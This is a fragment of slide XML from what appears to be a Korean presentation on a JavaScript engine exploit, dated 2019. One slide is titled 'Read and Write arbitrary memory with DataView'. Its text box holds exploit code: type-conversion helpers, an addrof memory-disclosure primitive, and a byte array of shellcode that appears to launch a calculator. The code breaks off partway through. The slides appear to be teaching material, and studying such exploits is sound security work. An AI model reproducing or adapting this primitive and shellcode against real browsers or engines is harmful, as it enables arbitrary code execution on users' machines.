        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3524610" y="4332511"/>
            <a:ext cx="414141" cy="246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tarr</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93" name="직사각형 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2920F913-29D7-45A2-8CE1-655E274C68A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3487674" y="5213886"/>
            <a:ext cx="491289" cy="246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view</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94" name="직사각형 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{950AE5C4-F51C-45AD-BBA7-620692066999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3324824" y="5849918"/>
            <a:ext cx="830599" cy="246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obj_addrof</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95" name="슬라이드 번호 개체 틀 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B0E74C-C110-441D-8982-5BABA25B73DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="날짜 개체 틀 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB6A7A7A-9876-4FC1-859A-F9C660F4D1CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{725D5ABD-F98A-45FA-A141-17131E35C83B}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3012868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8" y="866181"/>
            <a:ext cx="11773257" cy="276999"/>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sz="1200"/>
              <a:t>I will now explain the code to run the calculator by optimizing the PoC code described in the previous chapter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA497E1-B000-4529-A911-08A8FFDC8F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="6890983"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Read and Write arbitrary memory with DataView</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74496D10-0242-418A-A8D8-9683A1773E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="25905"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3844233" y="1191156"/>
            <a:ext cx="2537539" cy="5008214"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A71E7238-5A20-4C08-8536-A88C78C772DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421865" y="1191156"/>
            <a:ext cx="2901760" cy="5008214"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F07EA0E-9A95-46D3-9014-5F1CE3D0B31E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9363717" y="1191156"/>
            <a:ext cx="2559818" cy="5008214"/>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4" name="직사각형 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4FFFF2A-DB2E-423A-990B-573C4D50E837}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150278" y="1191156"/>
            <a:ext cx="3693955" cy="5288367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// HELPER FUNCTIONS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let conversion_buffer = new ArrayBuffer(16);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let float_view = new Float64Array(conversion_buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let bint_view = new BigUint64Array(conversion_buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let sint_view = new Uint32Array(conversion_buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.float_to_high_32bit = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    bint_view[0] = (bint_view[0] &gt;&gt; 32n) &amp; 0xffffffffn;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return sint_view[0];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.float_to_low_32bit = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    bint_view[0] = bint_view[0] &amp; 0xffffffffn;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return sint_view[0];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.setHighUint32 = function(val) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    bint_view[0] = (bint_view[0] &amp; 0x00000000ffffffffn) | (BigInt(val) &lt;&lt; 32n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return float_view[0];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.setLowUint32 = function(val) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    bint_view[0] = (bint_view[0] &amp; 0xffffffff00000000n) | BigInt(val);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return float_view[0];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>function addrof(o) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    obj_addrof['b'] = o;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return float_array[obj_prop_b_offset].float_to_low_32bit();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let shellcode = [0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                 0x54, 0x59, 0x52, 0x51, 0x64, 0x8B, 0x72, 0x30,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C, 0xAD, 0x8B,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                 0x5C, 0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07, 0x57,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                 0x1C, 0x01, 0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>const obj_prop_b_offset = 19;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var wfunc = null;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let iter_cnt = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var original;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var float_array;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var tarr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var obj_addrof;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
